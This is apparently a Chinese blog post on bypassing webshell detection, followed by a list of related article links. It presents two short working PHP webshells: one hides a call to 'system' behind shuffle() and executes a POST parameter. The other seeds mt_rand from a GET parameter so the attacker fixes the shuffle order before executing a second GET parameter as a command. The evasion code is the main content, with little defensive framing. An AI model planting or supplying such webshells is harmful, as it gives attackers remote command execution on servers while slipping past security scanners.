记一次学习--webshell绕过(利用清洗函数)

目录

样本

样本修改


样本

php 复制代码
<?php
$a = array("t", "system");
shuffle($a);
$a[0]($_POST[1]);

通过 shuffle 函数打乱数组,然后通过$a[0]取出第一个元素,打乱后第一个元素可能是t也可能是system。然后再进行POST传参进行命令执行。

这里抓包可以正常执行

样本修改

对于shuffle函数来说,他的随机是伪随机,我们可以通过对其代码的分析然后预测数组中元素打乱的规律。对于sheuffle来说底层调用的是mt_rand来生成随机值,以次控制打乱的数组中的元素的顺序。然后对于mt_rand来说当他的种子定好他的随机值就不会发生改变了。

php 复制代码
<?php
$arr = array("t","a","s","system");
function shift(&$arr){
mt_srand($_GET[0]);
shuffle($arr);
}
shift($arr);
$arr[2]($_GET[1]);
相关推荐
fen_fen3 小时前
学习笔记(32):matplotlib绘制简单图表-数据分布图
笔记·学习·matplotlib
qq_312920114 小时前
开源入侵防御系统——CrowdSec
安全·开源
饶了我吧,放了我吧5 小时前
计算机网络实验——无线局域网安全实验
计算机网络·安全·web安全
TracyCoder1236 小时前
Apache Shiro 框架详解
安全·apache·shiro·认证·登录
字节跳动安全中心7 小时前
当AI智能体学会“欺骗”,我们如何自保?来自火山的MCP安全答卷
安全·llm·mcp
萝卜青今天也要开心7 小时前
2025年上半年软件设计师考后分享
笔记·学习
muyun28008 小时前
安全访问云端内部应用:用frp的stcp功能解决SSH转发的痛点
运维·安全·ssh·frp
amazinging8 小时前
北京-4年功能测试2年空窗-报培训班学测开-第四十七天
python·学习·selenium
七仔あ8 小时前
小皮面板搭建pikachu靶场
网络·渗透
吃货界的硬件攻城狮8 小时前
【STM32 学习笔记】SPI通信协议
笔记·stm32·学习